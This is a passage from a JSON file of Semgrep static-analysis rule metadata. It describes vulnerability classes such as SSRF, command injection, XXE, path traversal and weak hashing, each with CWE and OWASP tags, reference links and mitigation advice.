[https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. "},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-ssrf.express-ssrf","id":"javascript.express.security.audit.express-ssrf.express-ssrf","name":"javascript.express.security.audit.express-ssrf.express-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-ssrf.express-ssrf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","id":"ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","name":"ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","id":"java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","name":"java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib library."},"help":{"markdown":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib library."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","id":"python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","name":"python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"setMultipleAllowances() is missing onlyOwner modifier"},"help":{"markdown":"setMultipleAllowances() is missing onlyOwner modifier\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control)\n - [https://twitter.com/danielvf/status/1494317265835147272](https://twitter.com/danielvf/status/1494317265835147272)\n - [https://etherscan.io/address/0x876b9ebd725d1fa0b879fcee12560a6453b51dc8](https://etherscan.io/address/0x876b9ebd725d1fa0b879fcee12560a6453b51dc8)\n - [https://play.secdim.com/game/dapp/challenge/rigoownsol](https://play.secdim.com/game/dapp/challenge/rigoownsol)\n","text":"setMultipleAllowances() is missing onlyOwner modifier"},"helpUri":"https://semgrep.dev/r/solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","id":"solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","name":"solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.react-href-url.react-href-url)\n - [https://github.com/segmentio/ui-box/blob/master/src/utils/safeHref.ts](https://github.com/segmentio/ui-box/blob/master/src/utils/safeHref.ts)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase."},"helpUri":"https://semgrep.dev/r/typescript.react.react-href-url.react-href-url","id":"typescript.react.react-href-url.react-href-url","name":"typescript.react.react-href-url.react-href-url","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.react-href-url.react-href-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request)\n - [https://godoc.org/github.com/dghubble/sling#Sling.Add](https://godoc.org/github.com/dghubble/sling#Sling.Add)\n - [https://github.com/dghubble/sling](https://github.com/dghubble/sling)\n","text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'."},"help":{"markdown":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'."},"helpUri":"https://semgrep.dev/r/go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","id":"go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","name":"go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","properties":{"precision":"very-high","tags":["CWE-300: Channel Accessible by Non-Endpoint","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","id":"java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","name":"java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected possible formatted SQL query. Use parameterized queries instead."},"help":{"markdown":"Detected possible formatted SQL query. Use parameterized queries instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.formatted-sql-query.formatted-sql-query)\n - [https://stackoverflow.com/questions/775296/mysql-parameterized-queries](https://stackoverflow.com/questions/775296/mysql-parameterized-queries)\n","text":"Detected possible formatted SQL query. Use parameterized queries instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.formatted-sql-query.formatted-sql-query","id":"python.lang.security.audit.formatted-sql-query.formatted-sql-query","name":"python.lang.security.audit.formatted-sql-query.formatted-sql-query","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.formatted-sql-query.formatted-sql-query"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","id":"python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","name":"python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value."},"help":{"markdown":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-redirect-to.check-redirect-to)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)\n","text":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","id":"ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","name":"ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-redirect-to.check-redirect-to"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file."},"help":{"markdown":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.filesystem.world-writable-file.world-writable-file)\n - [https://wiki.sei.cmu.edu/confluence/display/c/FIO06-C.+Create+files+with+appropriate+access+permissions](https://wiki.sei.cmu.edu/confluence/display/c/FIO06-C.+Create+files+with+appropriate+access+permissions)\n","text":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.filesystem.world-writable-file.world-writable-file","id":"cpp.lang.security.filesystem.world-writable-file.world-writable-file","name":"cpp.lang.security.filesystem.world-writable-file.world-writable-file","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.filesystem.world-writable-file.world-writable-file"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`."},"help":{"markdown":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","id":"terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","name":"terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/clojure.lang.security.use-of-sha1.use-of-sha1)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications."},"helpUri":"https://semgrep.dev/r/clojure.lang.security.use-of-sha1.use-of-sha1","id":"clojure.lang.security.use-of-sha1.use-of-sha1","name":"clojure.lang.security.use-of-sha1.use-of-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: clojure.lang.security.use-of-sha1.use-of-sha1"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design."},"help":{"markdown":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec)\n - [https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec](https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec)\n - [https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec](https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec)\n","text":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","id":"terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","name":"terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","properties":{"precision":"very-high","tags":["CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')","CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - 